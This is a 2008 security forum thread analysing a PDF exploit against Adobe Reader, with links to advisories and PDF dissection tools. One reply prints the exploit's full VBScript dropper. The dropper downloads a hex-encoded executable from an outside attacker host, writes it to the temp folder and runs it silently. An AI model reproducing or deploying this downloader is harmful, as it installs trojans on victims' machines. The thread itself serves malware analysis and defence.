Author Topic: New pdf exploit  (Read 4849 times)

0 Members and 1 Guest are viewing this topic.

November 07, 2008, 05:43:08 pm
Read 4849 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Adobe Reader vulnerability exploited in the wild
http://isc.sans.org/diary.html?storyid=5312

Quote
at the time of writing this article, according to VirusTotal 0 (yes ZERO) AV products detected this malicious PDF.
Ruining the bad guy's day

November 10, 2008, 11:32:57 am
Reply #1

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
This exploit execute some VBS downloader

Code: [Select]
<script language="VBScript">
on error resume next

Function DownloadExecute(source, target) on error resume next Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i, x

Set wobj = CreateObject("WScript.Shell") Set sobj = CreateObject("Scripting.FileSystemObject")

If VarType(xobj) <> vbObject Then Set xobj = CreateObject("MSXML2.XMLHTTP") If VarType(xobj) <> vbObject Then Set xobj = CreateObject("Microsoft.XMLHTTP")

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.setRequestHeader "Request", "xpreload"
   xobj.Send
   response = xobj.responseText

   If Len(response) > 1 And InStr(LCase(binstring), "<html>") = 0 Then

        Dim ss, sn, sp, sd(), bd()
        ss = Len(response)
        sn = 5000

        sp = FormatNumber((ss / sn), 0) + 1
        ReDim sd(sp), bd(sp)

        For i = 0 To sp
           sd(i) = Mid(response, (i*sn)+1, sn)

           For x = 1 To Len(sd(i)) Step 2
           bd(i) = bd(i) & Chr(Clng("&H" & Mid(sd(i), x, 2)))
           Next

           binstring = binstring & bd(i)
        Next

   Set tfold = sobj.GetSpecialFolder(2)
   Set tfile = tfold.CreateTextFile(target)
   tfile.Write binstring
   tfile.Close

   End If
End If

wobj.run tfold & Chr(92) & target, 0
End Function
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=xpre", "xpre.exe") </script>
 

xpre.exe - is downloader of some online games trojans

November 11, 2008, 03:09:43 am
Reply #2

pnuemo

  • Jr. Member

  • Offline
  • **

  • 11

November 11, 2008, 04:53:05 am
Reply #3

sowhat-x

  • Guest
Since many people out there seem to be interested in pdf exploit variants...
http://www3.malekal.com/pdf.txt

November 11, 2008, 12:40:36 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

November 11, 2008, 12:52:29 pm
Reply #5

sowhat-x

  • Guest
In the same spirit as article above...  ;)
http://www.757labs.com/projects/pdfresurrect/

November 11, 2008, 03:59:58 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Thanks, Conrad. ;)

infonews.ath.cx, Clicksor and a nasty PDF exploit
http://www.dynamoo.com/blog/2008/11/infonewsathcx-clicksor-and-nasty-pdf.html
Ruining the bad guy's day

November 11, 2008, 06:20:14 pm
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

November 11, 2008, 10:42:58 pm
Reply #8

pnuemo

  • Jr. Member

  • Offline
  • **

  • 11
i'm really enjoying all of this pdf stuff.  thanks for the links everyone.

November 12, 2008, 02:23:51 am
Reply #9

sowhat-x

  • Guest
And here's a win32 'semi-hackish' port of 757labs pdfresurrect... :)
I see that Didier Stevens also provides a couple of nifty python scripts in his blog:
http://blog.didierstevens.com/programs/pdf-tools/

November 12, 2008, 05:08:21 am
Reply #10

sowhat-x

  • Guest

November 12, 2008, 05:58:31 am
Reply #11

sowhat-x

  • Guest
And another useful app to exist in people's toolbox for pdf files' examination...
http://ccxvii.net/fitz/
Code: [Select]
pdftool show -b (print streams as raw binary data...)
pdftool show -d (decode streams...)
pdftool clean -x (expand compressed streams...)
etc etc...

November 12, 2008, 06:51:06 pm
Reply #12

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=249639&release_id=628626

btw. the latest info.pdf-thing is not using compressed streams for hiding javascripts. It uses graphic elements of PDF document. I do not know any tool that will extract these. You need to do a manual dissection (any text editor will do the job) and convert the data from Hex (ASCII codes) to Text, and/or from Unicode sequence to shellcode.

November 14, 2008, 02:49:57 am
Reply #13

cjeremy

  • Special Members
  • Full Member

  • Offline
  • *

  • 58
    • sudosecure
Bobby do you have a sample of these new pdf files.  I would like to examine them if you do.